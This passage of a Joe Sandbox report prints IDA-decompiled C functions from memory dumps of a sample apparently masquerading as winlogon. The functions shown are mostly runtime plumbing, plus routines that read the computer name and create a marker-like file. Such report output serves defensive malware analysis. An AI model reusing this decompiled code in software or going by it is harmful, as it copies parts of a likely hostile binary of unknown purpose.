    0x00d6a74d
    0x00d6a83c
    0x00d6a753
    0x00d6a753
    0x00d6a762
    0x00d6a76a
    0x00d6a76f
    0x00d6a771
    0x00d6a771
    0x00d6a779
    0x00d6a77a
    0x00d6a77b
    0x00d6a783
    0x00d6a797
    0x00d6a79e
    0x00d6a7a5
    0x00d6a82c
    0x00d6a7a7
    0x00d6a7ac
    0x00d6a7b6
    0x00d6a7bc
    0x00d6a7be
    0x00d6a7c5
    0x00d6a7c5
    0x00d6a7c5
    0x00d6a7e6
    0x00d6a7ea
    0x00d6a7f0
    0x00d6a7f2
    0x00d6a7f8
    0x00d6a804
    0x00d6a81a
    0x00d6a81a
    0x00d6a785
    0x00d6a795
    0x00d6a795
    0x00d6a783

    APIs
    • Sleep.KERNELBASE(00000001,?,?,?,?,?,?,00000000), ref: 00D6A7B6
    • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00D6A7C8
    • Sleep.KERNELBASE(00000001,?,?,?,?,?,?,00000000), ref: 00D6A7EA
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D65B80, Relevance: 4.6, APIs: 3, Instructions: 52
    C-Code - Quality: 88%
    			E00D65B80(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v1032;
				signed int _t8;
				void* _t12;
				long _t16;
				void* _t20;
				signed int _t30;

				_t28 = __edi;
				_t8 =  *0xd88004; // 0x276b9783
				_v8 = _t8 ^ _t30;
				E00D6D520(__edi,  &_v1032, 0, 0x400);
				_t12 = E00D65970(__ebx,  &_v1032, _t28, __esi); // executed
				if(_t12 == 0) {
					L7:
					return E00D6ABE4(_v8 ^ _t30);
				} else {
					_t16 = GetFileAttributesA( &_v1032); // executed
					if(_t16 != 0xffffffff) {
						L6:
						return E00D6ABE4(_v8 ^ _t30);
					} else {
						_t20 = CreateFileA( &_v1032, 0xc0000000, 3, 0, 2, 0, 0); // executed
						if(_t20 == 0 || _t20 == 0xcccccccc || _t20 == 0xffffffff) {
							goto L7;
						} else {
							CloseHandle(_t20);
							goto L6;
						}
					}
				}
			}










    0x00d65b80
    0x00d65b89
    0x00d65b90
    0x00d65ba1
    0x00d65baf
    0x00d65bb6
    0x00d65c10
    0x00d65c1f
    0x00d65bb8
    0x00d65bbf
    0x00d65bc8
    0x00d65bfd
    0x00d65c0f
    0x00d65bca
    0x00d65be0
    0x00d65be8
    0x00000000
    0x00d65bf6
    0x00d65bf7
    0x00000000
    0x00d65bf7
    0x00d65be8
    0x00d65bc8

    APIs
      • Part of subcall function 00D65970: GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65BBF
    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D65BE0
    • CloseHandle.KERNEL32(00000000), ref: 00D65BF7
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D76514, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    C-Code - Quality: 96%
    			E00D76514(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xd88004; // 0x276b9783
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					E00D7721A(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					E00D792B3(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
					E00D792B3(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00D6ABE4(_v8 ^ _t102);
			}































    0x00d76514
    0x00d7651f
    0x00d76526
    0x00d7652b
    0x00d76548
    0x00d76640
    0x00d76646
    0x00d76648
    0x00d76649
    0x00d76649
    0x00d7664b
    0x00d76651
    0x00d76651
    0x00d76653
    0x00d76655
    0x00d7665e
    0x00d76661
    0x00d7666d
    0x00d76674
    0x00d76684
    0x00d76676
    0x00d76676
    0x00d76679
    0x00d76679
    0x00d76679
    0x00d7667d
    0x00d7667d
    0x00000000
    0x00d7667d
    0x00d76663
    0x00d76663
    0x00d76668
    0x00d76668
    0x00d76680
    0x00d76680
    0x00d76680
    0x00d76686
    0x00d7668c
    0x00d76692
    0x00d76693
    0x00d76693
    0x00d7654e
    0x00d7654e
    0x00d76550
    0x00d76550
    0x00d76557
    0x00d76558
    0x00d7655c
    0x00d76562
    0x00d76568
    0x00d76590
    0x00d76590
    0x00d76592
    0x00000000
    0x00000000
    0x00d76571
    0x00d76575
    0x00d76587
    0x00d76587
    0x00d76589
    0x00000000
    0x00000000
    0x00d7657a
    0x00d7657c
    0x00d7657e
    0x00d76586
    0x00d76586
    0x00000000
    0x00d76586
    0x00000000
    0x00d7657c
    0x00d7658b
    0x00d7658b
    0x00d7658e
    0x00d7658e
    0x00d765aa
    0x00d765cb
    0x00d765f3
    0x00d765fb
    0x00d765fd
    0x00d765fd
    0x00d76607
    0x00d76617
    0x00d76619
    0x00d76630
    0x00d7661b
    0x00d7661b
    0x00d7661b
    0x00d7661b
    0x00d76620
    0x00000000
    0x00d76620
    0x00d76609
    0x00d76609
    0x00d7660e
    0x00d76627
    0x00d76627
    0x00d76627
    0x00d76637
    0x00d76638
    0x00d7663c
    0x00d766a7

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 00D76539
      • Part of subcall function 00D7721A: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D73AE8,?,00000000,?,00000001,?,?,00000001,00D73AE8,?), ref: 00D77267
      • Part of subcall function 00D7721A: __alloca_probe_16.NTDLLP ref: 00D7729F
      • Part of subcall function 00D7721A: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D772F0
      • Part of subcall function 00D7721A: GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D719A1,?), ref: 00D77302
      • Part of subcall function 00D7721A: __freea.LIBCMT ref: 00D7730B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D65770, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122
    C-Code - Quality: 86%
    			E00D65770(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v264;
				char _v1283;
				char _v1284;
				char _v1288;
				void* _v1292;
				long _v1296;
				signed int _t25;
				int _t31;
				void* _t33;
				char _t36;
				char _t37;
				void _t40;
				void _t41;
				void* _t44;
				intOrPtr _t45;
				void _t48;
				void _t49;
				void* _t54;
				void* _t55;
				signed int _t61;
				intOrPtr* _t66;
				signed int _t71;
				void* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				signed int _t81;
				void* _t82;
				void* _t84;
				void* _t96;
				void* _t98;
				signed int _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;

				_t82 = __edi;
				_t25 =  *0xd88004; // 0x276b9783
				_v8 = _t25 ^ _t99;
				_t54 = __ecx;
				E00D6D520(__edi,  &_v264, 0, 0x100);
				_t101 = _t100 + 0xc;
				_v1296 = 0xff;
				_t31 = GetComputerNameA( &_v264,  &_v1296); // executed
				if(_t31 != 0) {
					_v1292 = 0;
					_t33 = E00D65670(_t54,  &_v264, _v1296, _t82, __esi,  &_v1292);
					_t102 = _t101 + 4;
					if(_t33 == 0) {
						goto L1;
					} else {
						_t36 = "c:\\"; // 0x5c3a63
						_push(__esi);
						_push(_t82);
						_v1288 = _t36;
						_t37 =  *0xd85454; // 0x0
						_v1284 = _t37;
						E00D6D520(_t82,  &_v1283, 0, 0x3fb);
						_t77 = _v1292;
						_t103 = _t102 + 0xc;
						_t96 = _t77;
						do {
							_t40 =  *_t77;
							_t77 = _t77 + 1;
						} while (_t40 != 0);
						_t78 = _t77 - _t96;
						_t84 =  &_v1288 - 1;
						do {
							_t41 =  *(_t84 + 1);
							_t84 = _t84 + 1;
						} while (_t41 != 0);
						_t61 = _t78 >> 2;
						memcpy(_t84, _t96, _t61 << 2);
						_t44 = memcpy(_t96 + _t61 + _t61, _t96, _t78 & 0x00000003);
						_t105 = _t103 + 0x18;
						if(_t44 != 0 && _t44 != 0xffffffff && _t44 != 0xcccccccc) {
							E00D7009A(_t44);
							_t105 = _t105 + 4;
						}
						_t66 =  &_v1288;
						_t79 = _t66 + 1;
						do {
							_t45 =  *_t66;
							_t66 = _t66 + 1;
						} while (_t45 != 0);
						if(_t66 - _t79 < 0x3ff) {
							_t80 =  &_v1288;
							_t98 = _t80;
							do {
								_t48 =  *_t80;
								_t80 = _t80 + 1;
							} while (_t48 != 0);
							_t81 = _t80 - _t98;
							_t55 = _t54 - 1;
							asm("o16 nop [eax+eax]");
							do {
								_t49 =  *(_t55 + 1);
								_t55 = _t55 + 1;
							} while (_t49 != 0);
							_t71 = _t81 >> 2;
							memcpy(_t55, _t98, _t71 << 2);
							memcpy(_t98 + _t71 + _t71, _t98, _t81 & 0x00000003);
						}
						return E00D6ABE4(_v8 ^ _t99);
					}
				} else {
					L1:
					return E00D6ABE4(_v8 ^ _t99);
				}
			}









































    0x00d65770
    0x00d65779
    0x00d65780
    0x00d6578f
    0x00d65794
    0x00d65799
    0x00d6579c
    0x00d657b4
    0x00d657bc
    0x00d657e2
    0x00d657ec
    0x00d657f1
    0x00d657f6
    0x00000000
    0x00d657f8
    0x00d657f8
    0x00d657fd
    0x00d657fe
    0x00d657ff
    0x00d65805
    0x00d6580f
    0x00d6581e
    0x00d65823
    0x00d65829
    0x00d6582c
    0x00d65830
    0x00d65830
    0x00d65832
    0x00d65833
    0x00d6583d
    0x00d6583f
    0x00d65840
    0x00d65840
    0x00d65843
    0x00d65844
    0x00d65850
    0x00d65853
    0x00d6585a
    0x00d6585a
    0x00d6585e
    0x00d6586d
    0x00d65872
    0x00d65872
    0x00d65875
    0x00d6587b
    0x00d65880
    0x00d65880
    0x00d65882
    0x00d65883
    0x00d6588f
    0x00d65891
    0x00d65897
    0x00d658a0
    0x00d658a0
    0x00d658a2
    0x00d658a3
    0x00d658a7
    0x00d658a9
    0x00d658aa
    0x00d658b0
    0x00d658b0
    0x00d658b3
    0x00d658b4
    0x00d658bc
    0x00d658bf
    0x00d658c6
    0x00d658c6
    0x00d658dd
    0x00d658dd
    0x00d657be
    0x00d657be
    0x00d657ce
    0x00d657ce

    APIs
    • GetComputerNameA.KERNEL32(?,000000FF), ref: 00D657B4
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D74FB1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
    C-Code - Quality: 30%
    			E00D74FB1(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xd88004; // 0x276b9783
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E00D74C37(0x16, "LCMapStringEx", 0xd80b9c, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00D75039(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xd7f278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00D6ABE4(_v8 ^ _t33);
			}








    0x00d74fb1
    0x00d74fb6
    0x00d74fb7
    0x00d74fbe
    0x00d74fc1
    0x00d74fd3
    0x00d74fd8
    0x00d74fdf
    0x00d75022
    0x00d74fe1
    0x00d74ffe
    0x00d75004
    0x00d75004
    0x00d75036

    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,27E85006,00000001,?,?), ref: 00D75022
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D74D9C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    C-Code - Quality: 16%
    			E00D74D9C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xd88004; // 0x276b9783
				_v8 = _t4 ^ _t18;
				_t6 = E00D74C37(3, "FlsAlloc", 0xd80b34, 0xd80b3c); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xd7f278(_a4);
					 *_t16();
				}
				return E00D6ABE4(_v8 ^ _t18);
			}








    0x00d74da1
    0x00d74da2
    0x00d74da9
    0x00d74dbe
    0x00d74dc3
    0x00d74dca
    0x00d74ddb
    0x00d74dcc
    0x00d74dd1
    0x00d74dd7
    0x00d74dd7
    0x00d74def

    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • TlsAlloc.KERNEL32 ref: 00D74DDB
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6E0F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
    C-Code - Quality: 68%
    			E00D6E0F2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t6;
				intOrPtr* _t10;

				_t6 = E00D6DEE6(8, "InitializeCriticalSectionEx", 0xd7f6b4, "InitializeCriticalSectionEx"); // executed
				_t10 = _t6;
				if(_t10 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				L00D6B643();
				return  *_t10(_a4, _a8, _a12);
			}





    0x00d6e107
    0x00d6e10c
    0x00d6e113
    0x00000000
    0x00d6e12f
    0x00d6e120
    0x00000000

    APIs
      • Part of subcall function 00D6DEE6: GetProcAddress.KERNEL32(00000000,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74,00D90F50,00000FA0), ref: 00D6DF4A
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 00D6E12F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D733B0, Relevance: 3.2, APIs: 2, Instructions: 186file
    C-Code - Quality: 93%
    			E00D733B0(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				void* _t129;

				_t62 =  *0xd88004; // 0x276b9783
				_v8 = _t62 ^ _t128;
				_t110 = _a12;
				_v12 = _t110;
				_t124 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t124 >> 6;
						_t119 = (_t124 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0xd91260 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E00D75316(_t124, 0, 0, 2);
									_t129 = _t129 + 0x10;
								}
								_t69 = E00D72F55(_t107, _t119, __eflags, _t124);
								__eflags = _t69;
								if(_t69 == 0) {
									_t112 =  *((intOrPtr*)(0xd91260 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0); // executed
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										E00D72FCB(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E00D73198(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E00D730AA(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E00D72D35(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E00D6ABE4(_v8 ^ _t128);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0xd91260 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00D72122())) = 0x1c;
												_t81 = E00D7210F();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t126 = 5;
										__eflags = _t77 - _t126;
										if(_t77 != _t126) {
											_t81 = E00D720EC(_t77);
										} else {
											 *((intOrPtr*)(E00D72122())) = 9;
											 *(E00D7210F()) = _t126;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									E00D72EE8( &_v24, _t121, _v12);
									goto L15;
								}
							}
							 *(E00D7210F()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00D72122())) = 0x16;
							_t81 = E00D70269();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00D7210F()) =  *_t99 & _t121;
					 *((intOrPtr*)(E00D72122())) = 0x16;
					E00D70269();
					goto L41;
				}
				goto L41;
			}





































    0x00d733b8
    0x00d733bf
    0x00d733c2
    0x00d733c5
    0x00d733c9
    0x00d733cd
    0x00d733d0
    0x00d733d5
    0x00d733de
    0x00d733e0
    0x00d73401
    0x00d73406
    0x00d7340c
    0x00d7340f
    0x00d73412
    0x00d73419
    0x00d7341c
    0x00d7341f
    0x00d73423
    0x00d73426
    0x00d7342d
    0x00d7342f
    0x00d73431
    0x00d73433
    0x00d73452
    0x00d73455
    0x00d73455
    0x00d7345a
    0x00d73463
    0x00d73468
    0x00d73468
    0x00d7346c
    0x00d73472
    0x00d73474
    0x00d734b2
    0x00d734b9
    0x00d734bc
    0x00d734c1
    0x00d73510
    0x00d73513
    0x00d73516
    0x00d73522
    0x00d73528
    0x00d7352a
    0x00d73532
    0x00d73532
    0x00000000
    0x00d73535
    0x00d734c6
    0x00d734c6
    0x00d734c9
    0x00d73502
    0x00000000
    0x00d73502
    0x00d734cb
    0x00d734cb
    0x00d734ce
    0x00d734f2
    0x00000000
    0x00d734f2
    0x00d734d0
    0x00d734d3
    0x00000000
    0x00000000
    0x00d734e2
    0x00000000
    0x00d73476
    0x00d73476
    0x00d73478
    0x00d734a5
    0x00d734aa
    0x00d73495
    0x00d73538
    0x00d7353b
    0x00d7353c
    0x00d7353d
    0x00d7353e
    0x00d73541
    0x00d73543
    0x00d735a8
    0x00d735ab
    0x00d735ac
    0x00d735bb
    0x00d735bb
    0x00d73545
    0x00d73548
    0x00d7354a
    0x00d73570
    0x00d73573
    0x00d73576
    0x00d73579
    0x00d73580
    0x00d73585
    0x00d73590
    0x00d73595
    0x00d7359b
    0x00d735a0
    0x00d735a0
    0x00d735a3
    0x00000000
    0x00d735a3
    0x00d73587
    0x00d7358a
    0x00000000
    0x00000000
    0x00000000
    0x00d7358c
    0x00d7354e
    0x00d7354f
    0x00d73551
    0x00d73568
    0x00d73553
    0x00d73558
    0x00d73563
    0x00d73563
    0x00000000
    0x00d73551
    0x00d7347c
    0x00d7347f
    0x00000000
    0x00000000
    0x00d7348d
    0x00000000
    0x00d73492
    0x00d73474
    0x00d7343a
    0x00d73442
    0x00d73448
    0x00000000
    0x00d73448
    0x00d73428
    0x00d7342b
    0x00000000
    0x00000000
    0x00000000
    0x00d7342b
    0x00d733e7
    0x00d733ee
